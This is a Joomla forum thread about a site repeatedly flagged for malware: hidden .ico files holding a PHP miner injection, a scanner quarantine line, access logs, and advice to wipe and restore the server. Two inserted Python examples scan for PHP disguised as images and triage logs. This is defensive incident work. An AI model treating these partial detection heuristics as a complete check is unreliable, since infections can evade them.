plg_content_confirmconsent (3.9.0) 0 | plg_content_finder (3.0.0) 0 | plg_content_emailcloak (3.0.0) 1 | plg_content_vote (3.0.0) 0 | plg_content_pagebreak (3.0.0) 1 | plg_authentication_cookie (3.0.0) 1 | plg_authentication_joomla (3.0.0) 1 | plg_authentication_ldap (3.0.0) 0 | plg_authentication_gmail (3.0.0) 0 | plg_editors-xtd_image (3.0.0) 1 | plg_editors-xtd_fields (3.7.0) 1 | plg_editors-xtd_article (3.0.0) 1 | plg_editors-xtd_menu (3.7.0) 1 | plg_editors-xtd_readmore (3.0.0) 1 | plg_editors-xtd_module (3.5.0) 1 | plg_editors-xtd_pagebreak (3.0.0) 1 | plg_user_joomla (3.0.0) 1 | plg_user_terms (3.9.0) 0 | plg_user_contactcreator (3.0.0) 0 | plg_user_profile (3.0.0) 0 | plg_extension_joomla (3.0.0) 1 | plg_privacy_actionlogs (3.9.0) 1 | plg_privacy_content (3.9.0) 1 | plg_privacy_user (3.9.0) 1 | plg_privacy_consents (3.9.0) 1 | plg_privacy_message (3.9.0) 1 |
3rd Party:: plg_editors_codemirror (5.56.0) 1 | plg_editors_jce (2.9.1) 1 | plg_editors_tinymce (4.5.12) 1 | plg_fields_mediajce (2.9.1) 1 | plg_quickicon_akeebabackup (7.5.0.1) 1 | plg_quickicon_jce (2.9.1) 1 | PLG_ACTIONLOG_AKEEBABACKUP (7.5.0.1) 0 | PLG_CONSOLE_AKEEBABACKUP (7.5.0.1) 0 | plg_installer_jce (2.9.1) 1 | plg_system_jce (2.9.1) 1 | PLG_SYSTEM_BACKUPONUPDATE (7.5.0.1) 0 | plg_system_ossystem (1.3.1) 1 | plg_content_jce (2.9.1) 1 | plg_extension_jce (2.9.1) 1 | PLG_OSMAP_JOOMLA (4.2.39) 1 |
Templates Discovered ::
Templates :: Site :: protostar (1.0) 1 | beez3 (3.1.0) 1 |
Templates :: Admin :: hathor (3.0.0) 1 | isis (1.0) 1 |
Last edited by toivo on Tue Jan 05, 2021 5:50 pm, edited 2 times in total.
Reason: mod note: removed CODE tags, disabled smilies


Re: Malware detected in scans

Post by toivo » Tue Jan 05, 2021 6:06 pm

Observations from the FPA results:

The logs folder was created outside of Joomla. The main Joomla logs folder is administrator/logs.

The permissions of the folders logs and tmp have not been set correctly or the folders are unwritable. The System TMP folder is writable, exactly as it should be.

Where did the folder administrator/backup come from? Its permissions are 775, instead of 755. The backup folder used by Akeeba Backup is administrator/components/com_akeeba/backup.


Re: Malware detected in scans

Post by toivo » Tue Jan 05, 2021 6:38 pm

stuffdone wrote:
Tue Jan 05, 2021 5:25 pm
Last PHP Error(s) Reported :: [05-Jan-2021 00:22:19 UTC] PHP Warning: session_write_close(): Failed to write session data using user defined save handler. (session.save_path: /var/cpanel/php/sessions/ea-php72) in /home/yourpriv/public_html/libraries/joomla/session/handler/native.php on line 194
This PHP warning and its reference to "user defined save handler" looks unusual because /var/cpanel/php/sessions/ea-php72 points to PHP 7.2 but the site uses PHP 7.4.13. Check the configuration with the host support.


Re: Malware detected in scans

Post by Webdongle » Tue Jan 05, 2021 8:25 pm

1. Did you upload any files?
2. Have you scanned your PC for viruses?

.93fbb305.ico appears to be a hidden file. Chances are whatever you used to view/delete the files didn't see any hidden files when deleting.

stuffdone
Joomla! Guru
Posts: 728
Joined: Tue Oct 28, 2008 11:06 pm
Location: NE Florida
Contact:

Re: Malware detected in scans

Post by stuffdone » Wed Jan 06, 2021 3:43 pm

toivo wrote:
Tue Jan 05, 2021 6:38 pm
stuffdone wrote:
Tue Jan 05, 2021 5:25 pm
Last PHP Error(s) Reported :: wrote:[05-Jan-2021 00:22:19 UTC] PHP Warning: session_write_close(): Failed to write session data using user defined save handler. (session.save_path: /var/cpanel/php/sessions/ea-php72) in /home/yourpriv/public_html/libraries/joomla/session/handler/native.php on line 194
This PHP warning and its reference to "user defined save handler" looks unusual because /var/cpanel/php/sessions/ea-php72 points to PHP 7.2 but the site uses PHP 7.4.13. Check the configuration with the host support.
Sent this to host to investigate.

Had another hit this morning.

Code:

{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/plugins/fields/user/.a0746019.ico => /usr/local/maldetect/quarantine/.a0746019.ico.202825305
--- http://www.Stuffdone.com ---
Wow. Doing web sites for over 28+ years now. Still learn new tricks...not bad for an old dog

stuffdone
Joomla! Guru
Posts: 728
Joined: Tue Oct 28, 2008 11:06 pm
Location: NE Florida
Contact:

Re: Malware detected in scans

Post by stuffdone » Wed Jan 06, 2021 3:48 pm

toivo wrote:
Tue Jan 05, 2021 6:06 pm
Observations from the FPA results:

Where did the folder administrator/backup come from? Its permissions are 775, instead of 755. The backup folder used by Akeeba Backup administrator/components/com_akeeba/backup.
I created folder bc easier to locate and download backups. I will check with host about permissions because making a new folder should not make them 775 by default. I changed that just now.

stuffdone
Joomla! Guru
Posts: 728
Joined: Tue Oct 28, 2008 11:06 pm
Location: NE Florida
Contact:

Re: Malware detected in scans

Post by stuffdone » Wed Jan 06, 2021 3:50 pm

toivo wrote:
Tue Jan 05, 2021 6:06 pm
Observations from the FPA results:

The logs folder was created outside of Joomla. The main Joomla logs file is administrator/logs.
This is the joomla setting for logs in configuration.

/home/yourpriv/public_html/administrator/logs

stuffdone
Joomla! Guru
Posts: 728
Joined: Tue Oct 28, 2008 11:06 pm
Location: NE Florida
Contact:

Re: Malware detected in scans

Post by stuffdone » Wed Jan 06, 2021 3:53 pm

toivo wrote:
Tue Jan 05, 2021 6:06 pm
Observations from the FPA results:

The permissions of the folders logs and tmp have not been set correctly or the folders are unwritable. The System TMP folder is writable, exactly as it should be.

Both folders are at 755.

Webdongle
Joomla! Master
Posts: 44071
Joined: Sat Apr 05, 2008 9:58 pm

Re: Malware detected in scans

Post by Webdongle » Wed Jan 06, 2021 3:58 pm

That other 'hit' is a hidden file. Looks like you never deleted the hidden files.

stuffdone
Joomla! Guru
Posts: 728
Joined: Tue Oct 28, 2008 11:06 pm
Location: NE Florida
Contact:

Re: Malware detected in scans

Post by stuffdone » Wed Jan 06, 2021 4:30 pm

Webdongle wrote:
Wed Jan 06, 2021 3:58 pm
That other 'hit' is a hidden file. Looks like you never deleted the hidden files
No, all files, including hidden ones, are visible to me. I keep that setting bc of .htaccess and local .ini files.

I also downloaded the entire site locally and ran a search on that for *.ico and found all of them to ID their locations, then went to those locations on the server and could clearly see them and delete them and replace all the correct files from a clean unzipped copy of Joomla. That is where I also found the index.php files that had replaced .html files and occasionally a hidden .png file that was malware.

And to answer an earlier question, YES I keep AV, Malwarebytes, CCleaner etc. and keep my local desktop clean. Were that the source, other sites would also have been infected. It is ONLY this one domain attracting attention. I also run Wireshark just to see if anything is going on locally I might wish to check out.

Just a note: I really appreciate having more than one head. This site is not a paying customer. I can spend some time doing detective work in the hopes that protections are discovered that I can apply elsewhere. I am mostly retired (74) and stubborn enough to keep dogging this as long as you great people keep pointing to things to check.

THANK YOU ALL !
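The manual hunt described in the post above (hidden .ico dotfiles, a .gif that was really code, a hidden .png) can be turned into a repeatable check. This is an added example, not code from the thread or from Joomla: it walks a site tree and flags image-named files that are hidden, that do not begin with the magic number their extension promises, or that contain a PHP open tag. The sample tree it builds is constructed; the planted file name comes from the scan output in the thread, the favicon path is an assumption.

```python
import re
import tempfile
from pathlib import Path

# Image extensions the thread reports being abused as containers for PHP code.
IMAGE_EXTS = {".ico", ".gif", ".png", ".jpg", ".jpeg"}
# Genuine magic numbers; a PHP file dressed up as an image will not begin with one.
MAGIC = (b"\x00\x00\x01\x00", b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
PHP_TAG = re.compile(rb"<\?php|<\?=")

def inspect_file(path):
    """Return the reasons an image-named file looks suspicious (empty list if clean)."""
    with open(path, "rb") as fh:
        body = fh.read(64 * 1024)  # header plus enough of the body to see a PHP tag
    reasons = []
    if path.name.startswith("."):
        reasons.append("hidden dotfile with image extension")
    if not body.startswith(MAGIC):
        reasons.append("content does not start with an image magic number")
    if PHP_TAG.search(body):
        reasons.append("contains a PHP open tag")
    return reasons

def find_suspicious_images(root):
    """Walk a site tree; return sorted (relative path, reasons) pairs for suspect image files."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):  # unlike shell globs, pathlib's "*" also matches dotfiles
        if path.is_file() and path.suffix.lower() in IMAGE_EXTS:
            reasons = inspect_file(path)
            if reasons:
                findings.append((path.relative_to(root).as_posix(), "; ".join(reasons)))
    return sorted(findings)

def build_demo_tree():
    """Constructed sample tree, not real site data: one planted dotfile, one genuine icon."""
    base = Path(tempfile.mkdtemp())
    planted = base / "plugins/fields/user/.a0746019.ico"  # name taken from the thread's scan output
    planted.parent.mkdir(parents=True)
    planted.write_bytes(b"<?php /* constructed placeholder standing in for the quarantined file */ ?>")
    genuine = base / "templates/protostar/favicon.ico"  # assumed path for a legitimate icon
    genuine.parent.mkdir(parents=True)
    genuine.write_bytes(b"\x00\x00\x01\x00" + b"\x00" * 60)  # minimal ICO header
    return base

if __name__ == "__main__":
    for rel, why in find_suspicious_images(build_demo_tree()):
        print(f"{rel}: {why}")
```

Run it against a local copy of the site, as the post describes downloading one; a file that fails all three checks is the pattern the scanner above quarantined.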

stuffdone
Joomla! Guru
Posts: 728
Joined: Tue Oct 28, 2008 11:06 pm
Location: NE Florida
Contact:

Re: Malware detected in scans

Post by stuffdone » Wed Jan 06, 2021 4:34 pm

Just a note. I have access logs. 95% are bing and google bots.

I really am not adept at understanding log entries however.

Here is an example of one that does not seem related to my site. I know that there are bots out there just randomly seeking stuff online that have nothing to do with infections.

If you have a site, bots will sniff your fireplug.

Code:

114.119.130.57 - - [06/Jan/2021:07:39:05 -0800] "GET /docs/there%27s-a-ghost-in-the-house-i-like-the-way-they-rock-d61f32 HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://aspiegel.com/petalbot)"

66.249.75.17 - - [06/Jan/2021:07:39:59 -0800] "GET /docs/brioni-on-sale-d61f32 HTTP/1.1" 301 263 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

114.119.134.156 - - [06/Jan/2021:07:44:12 -0800] "GET /docs/mccormick-ranch-wedding-d61f32 HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://aspiegel.com/petalbot)"

114.119.136.87 - - [06/Jan/2021:07:49:16 -0800] "GET /docs/let%27s-pretend-audio-stories-d61f32 HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://aspiegel.com/petalbot)"

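A first step toward reading those access logs is to separate the crawler traffic (the "95% bing and google bots") from everything else, so the remaining lines are few enough to read by hand. This is an added example, not code from the thread: it parses Apache combined-format lines, counts hits from the crawlers that appear in the sample above, and returns the rest. The sample is constructed from three lines of the post plus one made-up non-crawler request using a TEST-NET address.

```python
import re
from collections import Counter

# Apache "combined" log format as written by the cPanel host in the thread:
# host ident user [time] "method path protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Crawlers present in the thread's sample; any other user agent deserves a human look.
KNOWN_CRAWLERS = ("Googlebot", "bingbot", "PetalBot")

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def triage(lines):
    """Return (crawler_counts, non_crawler_entries, unparsed_count) for a batch of lines."""
    crawlers, others, unparsed = Counter(), [], 0
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            unparsed += 1
            continue
        bot = next((name for name in KNOWN_CRAWLERS if name in entry["agent"]), None)
        if bot:
            crawlers[bot] += 1
        else:
            others.append(entry)
    return crawlers, others, unparsed

# Constructed sample: three lines copied from the post above plus one made-up
# non-crawler request (TEST-NET address, not a real client) and one junk line.
SAMPLE = [
    '114.119.130.57 - - [06/Jan/2021:07:39:05 -0800] "GET /docs/there%27s-a-ghost-in-the-house-i-like-the-way-they-rock-d61f32 HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://aspiegel.com/petalbot)"',
    '66.249.75.17 - - [06/Jan/2021:07:39:59 -0800] "GET /docs/brioni-on-sale-d61f32 HTTP/1.1" 301 263 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '114.119.134.156 - - [06/Jan/2021:07:44:12 -0800] "GET /docs/mccormick-ranch-wedding-d61f32 HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://aspiegel.com/petalbot)"',
    '203.0.113.7 - - [06/Jan/2021:07:50:02 -0800] "POST /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    'this line is deliberately not a log entry',
]

if __name__ == "__main__":
    crawlers, others, unparsed = triage(SAMPLE)
    print("crawler hits:", dict(crawlers), "| unparsed:", unparsed)
    for e in others:
        print(f"{e['ip']} {e['method']} {e['path']} -> {e['status']} agent={e['agent']!r}")
```

Feed the real log in with `triage(open(path))`; the returned non-crawler entries are the ones worth reading in order, with their method, path and status.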

Webdongle
Joomla! Master
Posts: 44071
Joined: Sat Apr 05, 2008 9:58 pm

Re: Malware detected in scans

Post by Webdongle » Wed Jan 06, 2021 6:11 pm

Where did you download the .ico files from?

brian
Joomla! Master
Posts: 12785
Joined: Fri Aug 12, 2005 7:19 am
Location: Leeds, UK
Contact:

Re: Malware detected in scans

Post by brian » Thu Jan 07, 2021 12:14 am

The problem is that you are healing the infection and not the virus (to borrow a topical analogy).

There is a script on your site that is creating those ico files. Simply finding them and deleting them will not fix anything - as you have discovered.

The actual script could have been uploaded to your site at any time during its lifetime. If there was a vulnerability reported on Monday morning and you didn't update until Monday afternoon, then that could happen. And of course, because it was publicly reported on the Monday morning, it means that someone knew about it before Monday.

From your comments it is clear that you have NOT deleted ALL the files on the server. You have just deleted the files that you think are the problem.

The only solution and the correct solution is to either
1) delete all the files from the server and start from scratch
2) delete all the files from the server and then restore from a backup. (Normally I would suggest that the backup might also be "infected", and as you had something monitoring your site you should only restore a site from before that date.)

It's exactly what everyone else has told you but in different words and perhaps now you will listen to them
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/

